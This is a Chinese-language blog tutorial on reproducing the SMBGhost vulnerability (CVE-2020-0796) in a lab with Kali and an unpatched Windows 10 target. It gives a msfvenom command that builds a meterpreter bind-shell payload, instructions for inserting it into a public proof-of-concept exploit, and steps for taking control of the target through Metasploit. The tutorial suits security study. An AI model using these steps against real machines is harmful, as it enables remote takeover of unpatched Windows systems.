本篇文章给大家分享的是有关CVE-2020-0796漏洞该怎么进行复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
一、漏洞介绍
Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。
影响范围:
Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)
二、漏洞复现
环境准备:
Kali系统 ip:172.16.0.27
被攻击机win10系统ip:172.16.0.29受此次漏洞影响的win10系统,并安装带python3.6.x,我这边用的是(复制下方链接可下载)ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C水4C印401036B0B1EBA64476A95F338|/ (去掉其中的水印二字)
ps:关闭defender防火墙
复现步骤:
1、查看环境情况Windows版本,按win+r,在弹出窗口中输入
查看版本信息
2、使用工具检测靶机是否存在漏洞,检测工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在此漏洞
3、kali使用msf生成木马,并查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '/x00' -i 1 -f python>exploit
4、下载poc,将生成的exploit.py 生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。
5、运行poc:python3.6 exploit.py -ip xx.xx.xx.xx (如果出现报错physical read primitive failed! 多运行几次)
6、启动msf监听本地端口,获得靶机权限,攻击成功(run失败就多run几次)
以上就是CVE-2020-0796漏洞该怎么进行复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。
原创文章,作者:kirin,如若转载,请注明出处:https://blog.ytso.com/tech/safety/220545.html